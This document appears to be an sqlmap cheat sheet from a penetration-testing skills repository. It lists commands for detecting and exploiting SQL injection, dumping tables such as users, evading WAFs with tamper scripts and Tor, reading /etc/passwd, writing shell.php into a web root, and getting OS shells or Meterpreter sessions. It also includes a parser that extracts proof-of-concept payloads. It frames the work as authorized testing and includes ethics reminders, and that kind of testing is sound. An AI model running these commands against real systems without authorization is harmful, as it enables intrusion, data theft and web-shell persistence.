The SQL injection swiss army knife.
pipx install sqlmap
# Or git
git clone https://github.com/sqlmapproject/sqlmap

# Test a URL parameter
sqlmap -u "https://target.com/page?id=1"
# Batch mode (no prompts)
sqlmap -u "https://target.com/page?id=1" --batch
# From request file (RECOMMENDED — captures cookies, headers)
sqlmap -r request.txt --batch

In Burp, right-click any request → "Copy to file". Save as request.txt. Then:
sqlmap -r request.txt --batch --level 3 --risk 2

# Levels (1-5): how many payloads are tried and which inputs get tested
# 1 = quick check, GET/POST parameters only (default)
# 2 = also tests Cookie values
# 3 = also tests User-Agent and Referer, more payloads per technique (recommended)
# 5 = every payload sqlmap has (slow)
# Risks (1-3): how intrusive the payloads are
# 1 = innocuous payloads (default; UNION tests already run at this risk)
# 2 = adds heavy-query time-based tests
# 3 = adds OR-based tests, which can alter data if the injection lands in an UPDATE/DELETE
sqlmap -r request.txt --batch --level 3 --risk 2

# Test specific parameter
sqlmap -u "URL" -p id
# Test multiple
sqlmap -u "URL" -p "id,username"
# All parameters: the default when -p is omitted. To pin one exact injection
# point instead, put a * marker in the URL or POST data:
sqlmap -u "https://target.com/page?id=1*"
# Cookie params
sqlmap -u "URL" --cookie="session=X; theme=Y" -p theme
# JSON body
sqlmap -u "URL" --data='{"id":1}' --headers="Content-Type: application/json"
# HTTP headers
sqlmap -u "URL" --headers="X-Forwarded-For: *"

# Cookie
sqlmap -u "URL" --cookie="session=ABC123"
# HTTP Basic
sqlmap -u "URL" --auth-type=Basic --auth-cred="user:pass"
# Form-based login: sqlmap has no login-form option, so log in once in the
# browser (or with curl), then reuse the session cookie or a -r request file
sqlmap -u "URL" --cookie="session=<value from the authenticated session>"
# If the form rotates an anti-CSRF token, let sqlmap fetch a fresh one per request
sqlmap -u "URL" --csrf-token="csrf" --csrf-url="https://target.com/login"
# OAuth token
sqlmap -u "URL" --headers="Authorization: Bearer eyJhbGci..."

# Specific technique
sqlmap -r request.txt --technique=BEUSTQ
# B = Boolean-blind
# E = Error-based
# U = UNION
# S = Stacked queries
# T = Time-based blind
# Q = inline queries
# Only time-based (when blind)
sqlmap -r request.txt --technique=T

# Tell sqlmap the DB to skip detection
sqlmap -r request.txt --dbms=mysql
# Options include: mysql, postgresql, mssql, oracle, sqlite, sybase, mariadb, h2,
# informix, hsqldb, mckoi, ibm_db2, firebird, monetdb, cubrid,
# maxdb, intersystems_cache (not an exhaustive list)

# All DBs
sqlmap -r request.txt --batch --dbs
# Tables in a DB
sqlmap -r request.txt --batch -D mydb --tables
# Columns in a table
sqlmap -r request.txt --batch -D mydb -T users --columns
# Dump a table
sqlmap -r request.txt --batch -D mydb -T users --dump
# Dump with conditions
sqlmap -r request.txt --batch -D mydb -T users --dump --where "id=1"
# Current user / DB
sqlmap -r request.txt --batch --current-user --current-db
# Privileges
sqlmap -r request.txt --batch --privileges
# Roles (Oracle)
sqlmap -r request.txt --batch --roles
# All
sqlmap -r request.txt --batch --all

# List all tampers
sqlmap --list-tamper
# Use specific tamper
sqlmap -r request.txt --tamper=space2comment
# Chain tampers
sqlmap -r request.txt --tamper=space2comment,between,randomcase
# Common combinations:
# Cloudflare-aware
sqlmap -r request.txt --tamper=space2comment,between,randomcase --random-agent
# AWS WAF
sqlmap -r request.txt --tamper=charencode,space2comment --random-agent
# Generic strong
sqlmap -r request.txt --tamper=space2comment,charunicodeencode,randomcase
# claude-cybersecurity-skills custom (after install)
sqlmap -r request.txt --tamper=ccs_random_case_between
sqlmap -r request.txt --tamper=ccs_double_url_encode
sqlmap -r request.txt --tamper=ccs_unicode_encode

# Delay between requests (seconds)
sqlmap -r request.txt --delay=1
# Random User-Agent
sqlmap -r request.txt --random-agent
# Use Tor
sqlmap -r request.txt --tor --tor-type=SOCKS5 --tor-port=9050
# Use proxy (Burp)
sqlmap -r request.txt --proxy="http://127.0.0.1:8080"
# Threads
sqlmap -r request.txt --threads=10
# Timeout
sqlmap -r request.txt --timeout=30 --retries=3

# Read file from DB host
sqlmap -r request.txt --file-read="/etc/passwd"
# Write file
sqlmap -r request.txt --file-write="shell.php" --file-dest="/var/www/html/shell.php"
# OS shell (DBA + write needed)
sqlmap -r request.txt --os-shell
# OS pwn: out-of-band Meterpreter/VNC session through Metasploit (needs msf
# installed locally; same DBA + file-write prerequisites as --os-shell)
sqlmap -r request.txt --os-pwn
# OS command
sqlmap -r request.txt --os-cmd="id"

# Save findings dir
sqlmap -r request.txt --output-dir=./loot/
# Force a DBMS instead of fingerprinting it (same as --dbms above)
sqlmap -r request.txt --dbms=mysql --batch
# Max verbosity: -v 3 shows the injected payloads, -v 6 every request and full response
sqlmap -r request.txt -v 6

# 1. From Burp request → save as request.txt
# 2. Initial check
sqlmap -r request.txt --batch --level 3 --risk 2
# 3. If vulnerable, enumerate
sqlmap -r request.txt --batch --dbs
# 4. Dump a SAMPLE for PoC (not entire DB!)
sqlmap -r request.txt --batch -D target_db -T users --dump --where "id=1"
# 5. Stop. Don't extract more than needed. Report.

- Running on production without rate limits. You'll DoS the target or get banned.
- Dumping entire databases. Ethical violation; one row proves the bug.
- Trusting sqlmap output blindly. Verify with manual payloads.
- No WAF bypass when WAF detected. Always try tampers.
- No --level and --risk. Defaults are weak.
Located at arsenal/sqlmap-tampers/:
- ccs_random_case_between.py: case randomization + BETWEEN bypass + space-to-/**/ (multi-layer Cloudflare bypass)
- ccs_unicode_encode.py: Unicode escape sequences for SQL keywords
- ccs_double_url_encode.py: double URL-encode dangerous chars (WAF-decode-once bypass)
Install (run from repo root):
cp arsenal/sqlmap-tampers/*.py "$(pipx environment --value PIPX_LOCAL_VENVS)"/sqlmap/lib/python*/site-packages/sqlmap/tamper/
# (keep the python* glob outside the quotes, otherwise the shell will not expand it)

Then:
sqlmap -r request.txt --tamper=ccs_random_case_between

Look for:
[INFO] testing '<technique title>'                                  (each payload family being tried)
[INFO] heuristic (basic) test shows that ... might be injectable   (worth pursuing, not proof)
[INFO] ... parameter '...' appears to be '...' injectable          (candidate found)
[INFO] ... parameter '...' is '...' injectable                     (confirmed)
sqlmap identified the following injection point(s) ...              (final report, also written to the log file in the output dir)
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: <the exact injected string>
Save the exact payload sqlmap used → use in your PoC report.
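Pulling the payload out of the report by hand is error-prone on a long run, so here is an added helper written for this page (not part of sqlmap or of this repo). It assumes the `Parameter:` / `Type:` / `Title:` / `Payload:` block layout that sqlmap prints at the end of a run and writes to the log file in the output dir; the `SAMPLE_REPORT` is a constructed example in that layout, not output from a real target. `pick_poc` prefers deterministic techniques over sleep-based ones, which is the practitioner's usual choice for a reproducible PoC.

```python
import re

# Constructed sample in sqlmap's injection-point report layout (not real scan output).
SAMPLE_REPORT = """\
sqlmap identified the following injection point(s) with a total of 73 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 4120=4120

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 2893 FROM (SELECT(SLEEP(5)))xYzA)
---
"""

_PARAM_RE = re.compile(r"^Parameter:\s+(?P<name>.+?)\s+\((?P<place>[^)]+)\)\s*$")
_FIELD_RE = re.compile(r"^\s+(?P<key>Type|Title|Payload):\s+(?P<value>.*?)\s*$")

# PoC preference: cheap and deterministic first, sleep-based last (assumed ordering).
_PREFERENCE = ("error-based", "UNION query", "boolean-based blind",
               "inline query", "stacked queries", "time-based blind")


def parse_injection_points(report):
    """Return one {parameter, place, type, title, payload} dict per confirmed technique."""
    points = []
    parameter = place = None
    for line in report.splitlines():
        m = _PARAM_RE.match(line)
        if m:                                   # "Parameter: id (GET)" opens a parameter block
            parameter, place = m.group("name"), m.group("place")
            continue
        m = _FIELD_RE.match(line)
        if not m or parameter is None:          # skip banner, '---' and anything before a Parameter:
            continue
        key, value = m.group("key").lower(), m.group("value")
        if key == "type":                       # each Type: line starts a new entry
            points.append({"parameter": parameter, "place": place, "type": value})
        elif points:                            # Title:/Payload: belong to the latest entry
            points[-1][key] = value
    return points


def pick_poc(points):
    """Choose the single entry whose payload goes into the report."""
    def rank(point):
        kind = point["type"].lower()
        for i, pref in enumerate(_PREFERENCE):
            if pref.lower() in kind:
                return i
        return len(_PREFERENCE)                 # unknown technique sorts last
    return min(points, key=rank) if points else None


def poc_line(point):
    """One-line reproduction note for the write-up."""
    return "%s parameter '%s': %s via %r" % (
        point["place"], point["parameter"], point["type"], point["payload"])


if __name__ == "__main__":
    import sys
    # Usage: python poc_from_report.py <output-dir>/<host>/log   (falls back to the sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_REPORT
    chosen = pick_poc(parse_injection_points(text))
    print(poc_line(chosen) if chosen else "no injection points found")
```

Run it against the log file sqlmap leaves under `--output-dir` and paste the printed line, with the exact payload, into the PoC section of the report; one reproducible payload is all the report needs.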
- Test only authorized targets
- Don't dump production DBs — sample is enough
- Throttle queries on rate-limited targets
- If you accidentally got more data than intended, delete it and note in report